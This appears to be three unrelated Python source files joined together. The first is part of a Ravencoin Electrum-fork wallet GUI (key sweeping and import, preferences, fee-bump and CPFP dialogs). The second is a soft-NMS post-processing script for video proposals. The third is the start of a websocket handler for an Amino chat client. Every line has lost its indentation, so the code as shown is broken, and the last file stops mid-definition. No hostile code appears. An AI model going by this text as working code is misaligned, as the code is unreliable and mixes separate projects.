h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum.wallet import sweep_preparations
try:
self.do_clear()
if get_pk() is not None:
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(self.config.get('use_rbf', True))
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', x == Qt.Checked)
# rbf disable
if self.config.get('use_rbf', True):
self.config.set_key('use_rbf', False)
use_rbf_cb.stateChanged.connect(on_use_rbf)
#fee_widgets.append((use_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 RVN = 1000 mRVN. 1 mRVN = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_list.refresh_headers()
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
# new_tx.set_rbf(True)
new_tx.set_rbf(False)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except CannotBumpFee as e:
self.show_error(str(e))
return
#if is_final:
# new_tx.set_rbf(True)
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(":icons/offline_tx.png"), None, _('Success'), msg)
return True
|
post_processing.py
|
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import json
import multiprocessing as mp
from utils import iou_with_anchors
def load_json(file):
with open(file) as json_file:
data = json.load(json_file)
return data
def getDatasetDict(opt):
# df = pd.read_csv(opt["video_info"])
# json_data = load_json(opt["video_anno"])
# database = json_data
# video_dict = {}
# for i in range(len(df)):
# video_name = df.video.values[i]
# video_info = database[video_name]
# video_new_info = {}
# video_new_info['duration_frame'] = video_info['duration_frame']
# video_new_info['duration_second'] = video_info['duration_second']
# video_new_info["feature_frame"] = video_info['feature_frame']
# video_subset = df.subset.values[i]
# video_new_info['annotations'] = video_info['annotations']
# if video_subset == 'validation':
# video_dict[video_name] = video_new_info
# return video_dict
subset = "validation"
anno_database1 = load_json(opt["video_anno"])
anno_database2 = load_json(opt["video_info"])
anno_database2 = anno_database2['database']
video_dict = {}
for key, items in anno_database1.items():
video_name = key
video_info = items
temp_dict = anno_database2[key[2:]]
video_info['resolution'] = temp_dict['resolution']
video_info['url'] = temp_dict['url']
video_subset = items['subset']
if subset in video_subset:
video_dict[video_name] = video_info
return video_dict
def soft_nms(df, alpha, t1, t2):
'''
df: proposals generated by network;
alpha: alpha value of Gaussian decaying function;
t1, t2: threshold for soft nms.
'''
df = df.sort_values(by="score", ascending=False)
tstart = list(df.xmin.values[:])
tend = list(df.xmax.values[:])
tscore = list(df.score.values[:])
rstart = []
rend = []
rscore = []
while len(tscore) > 1 and len(rscore) < 101:
max_index = tscore.index(max(tscore))
tmp_iou_list = iou_with_anchors(
np.array(tstart),
np.array(tend), tstart[max_index], tend[max_index])
for idx in range(0, len(tscore)):
if idx != max_index:
tmp_iou = tmp_iou_list[idx]
tmp_width = tend[max_index] - tstart[max_index]
if tmp_iou > t1 + (t2 - t1) * tmp_width:
tscore[idx] = tscore[idx] * np.exp(-np.square(tmp_iou) /
alpha)
rstart.append(tstart[max_index])
rend.append(tend[max_index])
rscore.append(tscore[max_index])
tstart.pop(max_index)
tend.pop(max_index)
tscore.pop(max_index)
newDf = pd.DataFrame()
newDf['score'] = rscore
newDf['xmin'] = rstart
newDf['xmax'] = rend
return newDf
def video_post_process(opt, video_list, video_dict):
for video_name in video_list:
df = pd.read_csv("./output/BMN_results/" + video_name + ".csv")
# print("\JEFFERY WAS HERE\n")
if len(df) > 1:
snms_alpha = opt["soft_nms_alpha"]
snms_t1 = opt["soft_nms_low_thres"]
snms_t2 = opt["soft_nms_high_thres"]
df = soft_nms(df, snms_alpha, snms_t1, snms_t2)
# print(video_name, len(df))
df = df.sort_values(by="score", ascending=False)
video_info = video_dict[video_name]
video_duration = float(video_info["duration_frame"] // 16 * 16) / video_info["duration_frame"] * video_info[
"duration_second"]
proposal_list = []
for j in range(min(100, len(df))):
tmp_proposal = {}
tmp_proposal["score"] = df.score.values[j]
tmp_proposal["segment"] = [max(0, df.xmin.values[j]) * video_duration,
min(1, df.xmax.values[j]) * video_duration]
proposal_list.append(tmp_proposal)
result_dict[video_name[2:]] = proposal_list
def BMN_post_processing(opt):
video_dict = getDatasetDict(opt)
video_list = list(video_dict.keys()) # [:100]
global result_dict
result_dict = mp.Manager().dict()
# result_dict = {}
# print(len(video_list))
# video_post_process(opt, video_list, video_dict)
num_videos = len(video_list)
num_videos_per_thread = num_videos // opt["post_process_thread"]
processes = []
for tid in range(opt["post_process_thread"] - 1):
tmp_video_list = video_list[tid * num_videos_per_thread:(tid + 1) * num_videos_per_thread]
p = mp.Process(target=video_post_process, args=(opt, tmp_video_list, video_dict))
p.start()
processes.append(p)
tmp_video_list = video_list[(opt["post_process_thread"] - 1) * num_videos_per_thread:]
p = mp.Process(target=video_post_process, args=(opt, tmp_video_list, video_dict))
p.start()
processes.append(p)
for p in processes:
p.join()
result_dict = dict(result_dict)
# print("\nBEN WAS HERE\n", result_dict)
output_dict = {"version": "VERSION 1.3", "results": result_dict, "external_data": {}}
outfile = open(opt["result_file"], "w")
json.dump(output_dict, outfile)
outfile.close()
# opt = opts.parse_opt()
# opt = vars(opt)
# BSN_post_processing(opt)
|
socket.py
|
import time
import json
import websocket
import threading
import contextlib
from sys import _getframe as getframe
from .lib.util import objects
class SocketHandler:
def __init__(self, client, socket_trace = False, debug = False):
# websocket.enableTrace(True)
self.socket_url = "wss://ws1.narvii.com"
self.client = client
self.debug = debug
self.active = True
self.headers = None
self.socket = None
self.socket_thread = None
self.reconnect = True
self.socket_stop = False
self.socketDelay = 0
self.socket_trace = socket_trace
self.socketDelayFetch = 60 # Reconnects every 60 seconds.
#threading.Thread(target=self.reconnect_handler).start()
#websocket.enableTrace(socket_trace)
def run(self):
threading.Thread(target=self.reconnect_handler).start()
websocket.enableTrace(self.socket_trace)
def reconnect_handler(self):
# Made by enchart#3410 thx
# Fixed by The_Phoenix#3967
# Fixed by enchart again lmao
# Fixed by Phoenix one more time lol
while True:
if self.debug:
print(f"[socket][reconnect_handler] socketDelay : {self.socketDelay}")
if self.socketDelay >= self.socketDelayFetch and self.active:
if self.debug:
print(f"[socket][reconnect_handler] socketDelay >= {self.socketDelayFetch}, Reconnecting Socket")
self.close()
self.start()
self.socketDelay = 0
self.socketDelay += 5
if not self.reconnect:
if self.debug:
print(f"[socket][reconnect_handler] reconnect is False, breaking")
break
time.sleep(5)
def on_open(self):
if self.debug:
print("[socket][on_open] Socket Opened")
def on_close(self):
if self.debug:
print("[socket][on_close] Socket Closed")
self.active = False
if self.reconnect:
if self.debug:
print("[socket][on_close] reconnect is True, Opening Socket")
def on_ping(self, data):
if self.debug:
print("[socket][on_ping] Socket Pinged")
contextlib.suppress(self.socket.sock.pong(data))
def handle_message(self, data):
self.client.handle_socket_message(data)
return
def send(self, data):
if self.debug:
print(f"[socket][send] Sending Data : {data}")
self.socket.send(data)
def start(self):
if self.debug:
print(f"[socket][start] Starting Socket")
self.headers = {
"NDCDEVICEID": self.client.device_id,
"NDCAUTH": f"sid={self.client.sid}"
}
self.socket = websocket.WebSocketApp(
f"{self.socket_url}/?signbody={self.client.device_id}%7C{int(time.time() * 1000)}",
on_message = self.handle_message,
on_open = self.on_open,
on_close = self.on_close,
on_ping = self.on_ping,
header = self.headers
)
threading.Thread(target = self.socket.run_forever, kwargs = {"ping_interval": 60}).start()
self.reconnect = True
self.active = True
if self.debug:
print(f"[socket][start] Socket Started")
def close(self):
if self.debug:
print(f"[socket][close] Closing Socket")
self.reconnect = False
self.active = False
self.socket_stop = True
try:
self.socket.close()
except Exception as closeError:
if self.debug:
print(f"[socket][close] Error while closing Socket : {closeError}")
return
class Callbacks:
def __init__(self, client):
self.client = client
self.handlers = {}
self.methods = {
304: self._resolve_chat_action_start,
306: self._resolve_chat_action_end,
1000: self._resolve_chat_message
}
self.chat_methods = {
"0:0": self.on_text_message,
"0:100": self.on_image_message,
"0:103": self.on_youtube_message,
"1:0": self.on_strike_message,
"2:110": self.on_voice_message,
"3:113": self.on_sticker_message,
"50:0": self.TYPE_USER_SHARE_EXURL,
"51:0": self.TYPE_USER_SHARE_USER,
